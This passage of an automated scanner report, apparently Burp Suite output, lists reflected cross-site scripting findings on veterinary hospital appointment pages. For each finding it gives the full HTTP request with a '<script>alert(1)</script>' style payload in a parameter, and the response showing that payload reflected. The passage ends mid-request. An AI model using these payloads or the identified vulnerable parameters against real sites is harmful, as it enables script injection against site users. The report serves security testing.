User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/manhattan-veterinary-group/appt.html?7c5c9"><script>alert(1)</script>49734066e86=1" />
...[SNIP]...

2.86. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21aa2"><a>e74c5ada644 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /marshfield/appt.html21aa2"><a>e74c5ada644 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="appt21aa2"><a>e74c5ada644">
...[SNIP]...

2.87. http://www.vcahospitals.com/marshfield/appt.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd2e3"><script>alert(1)</script>47355e93e99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marshfield/appt.html?fd2e3"><script>alert(1)</script>47355e93e99=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/marshfield/appt.html?fd2e3"><script>alert(1)</script>47355e93e99=1" />
...[SNIP]...

2.88. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea8b"><a>f918a068f09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /new-york-veterinary-hospital/appt.html5ea8b"><a>f918a068f09 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:46:43 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="appt5ea8b"><a>f918a068f09">
...[SNIP]...

2.89. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [altphone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the altphone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ac2"><script>alert(1)</script>30c7bc9b5b5 was submitted in the altphone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=d9ac2"><script>alert(1)</script>30c7bc9b5b5&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=o863b4qroqo4ij6djcsf0v35n1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="altphone" id="altphone" type="text" size="30" maxlength="20" value="d9ac2"><script>alert(1)</script>30c7bc9b5b5" />
...[SNIP]...

2.90. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the ampm1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46150"><script>alert(1)</script>eaeb03d5426 was submitted in the ampm1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM46150"><script>alert(1)</script>eaeb03d5426&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t5ueh83st72q06n8bhh94jq2i1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM46150"><script>alert(1)</script>eaeb03d5426&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source
...[SNIP]...

2.91. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the ampm2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c93b"><script>alert(1)</script>6aa43ad2da9 was submitted in the ampm2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM9c93b"><script>alert(1)</script>6aa43ad2da9&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=a4vbafvn3edv5idqhqabu1vbf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM9c93b"><script>alert(1)</script>6aa43ad2da9&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york
...[SNIP]...

2.92. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the ampm3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75d4"><script>alert(1)</script>ec5002bcf17 was submitted in the ampm3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AMd75d4"><script>alert(1)</script>ec5002bcf17&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dn